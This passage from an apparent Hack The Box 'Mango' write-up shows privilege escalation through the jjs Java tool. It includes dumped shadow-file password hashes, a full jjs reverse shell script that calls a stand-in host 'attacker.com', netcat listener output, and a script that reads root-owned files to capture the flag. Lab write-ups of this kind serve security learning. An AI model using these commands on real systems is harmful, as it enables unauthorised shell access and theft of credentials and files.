lxd:*:17941:0:99999:7:::
uuidd:*:17941:0:99999:7:::
dnsmasq:*:17941:0:99999:7:::
landscape:*:17941:0:99999:7:::
pollinate:*:17941:0:99999:7:::
sshd:*:18166:0:99999:7:::
mango:$6$D9GOkLkh$Il/e.J35n8XniWWTWXPoXj0w.YwwVS2uAy5EHR8GoyZBoMj02sGSLXakk0nsCJS2v1SrWA6y.y2GCR3L/T5h41:18166:0:99999:7:::
admin:$6$Ls6eLFhb$XoRxrUPmgvjcZSoN1OnYWIlb7ALWvcaiK3MubdX99C08H1lWLfXDipAmqdRc6yikHUwaixBD/UnK/GhFx/tIY1:18166:0:99999:7:::
mongodb:*:18166:0:99999:7:::
jjs> admin@mango:/home/admin$
This means we can use jjs to read files owned by root. There is also a way to get a reverse shell using the following sample:
export RHOST=attacker.com
export RPORT=12345
echo 'var host=Java.type("java.lang.System").getenv("RHOST");
var port=Java.type("java.lang.System").getenv("RPORT");
var ProcessBuilder = Java.type("java.lang.ProcessBuilder");
var p=new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
var Socket = Java.type("java.net.Socket");
var s=new Socket(host,port);
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Java.type("java.lang.Thread").sleep(50);
  try {p.exitValue();break;}catch (e){}
};
p.destroy();s.close();' | jjs
But running it and expecting a privileged reverse shell led us nowhere: we ended up with a reverse shell running as admin, and no privilege escalation happened:
root@kali:/home/root/Documents/HTB-Labs/Mango# nc -lnvp 12345
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 10.10.10.162.
Ncat: Connection from 10.10.10.162:35640.
bash-4.4$ pwd
pwd
/home/admin
bash-4.4$ id
id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
bash-4.4$ cd /root
cd /root
bash: cd: /root: Permission denied
bash-4.4$
Based on our test against the shadow file, let's now try the file read directly on the root flag from a bash script and see what we get. Remember one thing about HTB machines: the root flag file is typically found in the root user's home directory, /root.
Script
#!/bin/bash
echo 'var BufferedReader = Java.type("java.io.BufferedReader")
var FileReader = Java.type("java.io.FileReader")
var br = new BufferedReader(new FileReader("/root/root.txt"))
while ((line = br.readLine()) != null) { print(line); }' | jjs
Execution
admin@mango:/home/admin$ sh test.sh
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a8ef**********************9ab15
jjs> admin@mango:/home/admin$
AND WE GOT THE ROOT FLAG!!!!!!
This means we can read files owned by root through jjs, but we cannot get a reverse shell as root.